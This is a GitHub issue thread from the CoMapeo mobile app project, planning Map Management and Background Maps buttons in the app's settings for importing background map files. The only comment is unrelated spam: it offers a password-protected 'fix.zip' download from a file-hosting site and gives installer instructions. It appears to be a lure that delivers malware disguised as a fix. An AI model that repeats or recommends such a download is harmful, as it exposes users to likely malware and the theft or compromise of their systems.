### ISSUE TITLE
Menu Path / Settings

### ISSUE THREAD

**Issue by ximenabb** [digidem/comapeo-mobile#622]
**Description**
Goal : Improved workflow for importing a background map into CoMapeo, by allowing the user to pick the background map file from a file-picker in the app, rather than requiring the user to place the background map file in a specific location
An interim solution until the Map Manager feature is brought to CoMapeo
 
Relates to https://github.com/digidem/comapeo-mobile/issues/624 https://github.com/digidem/comapeo-mobile/issues/623

**Todo**
<img width="708" alt="Screen Shot 2024-08-26 at 12 33 57 PM" src="https://github.com/user-attachments/assets/cdf587c7-4f0d-4863-a43c-b4d4d02aa9f8">

- [ ] Add **Map Management** button in **App Setings**
- [ ] Add **Background Maps** button  in **Map Management**

**Design**
https://www.figma.com/design/iUeC0Qzhb4H0unuPfxQAsM/(Mobile)-CoMapeo?node-id=2179-1778&t=pHGODPSppOLjQUPF-0

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
